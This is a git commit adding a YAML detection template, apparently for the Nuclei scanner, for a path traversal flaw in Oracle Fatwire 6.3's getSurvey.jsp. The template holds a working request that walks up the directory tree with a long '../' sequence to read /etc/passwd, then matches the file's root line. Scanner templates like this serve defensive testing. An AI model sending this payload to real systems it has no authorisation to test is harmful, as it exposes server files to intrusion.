Create oracle-fatwire-lfi.yaml (#3975)

* Create oracle-fatwire-lfi.yaml * Update oracle-fatwire-lfi.yaml * Update oracle-fatwire-lfi.yaml Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io>
2022-03-26 14:56:13 +05:30 · 2022-03-26 14:56:13 +05:30 · 948ceb8b11
parent ac87976a84
commit 948ceb8b11
1 changed files with 25 additions and 0 deletions
--- a/vulnerabilities/other/oracle-fatwire-lfi.yaml
+++ b/vulnerabilities/other/oracle-fatwire-lfi.yaml
@ -0,0 +1,25 @@
+id: oracle-fatwire-lfi
+
+info:
+  name: Oracle Fatwire 6.3 - Path Traversal
+  author: Bernardo Rodrigues @bernardofsr
+  severity: critical
+  description: Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint
+  reference: https://www.exploit-db.com/exploits/50167
+  tags: lfi,oracle,fatwire
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200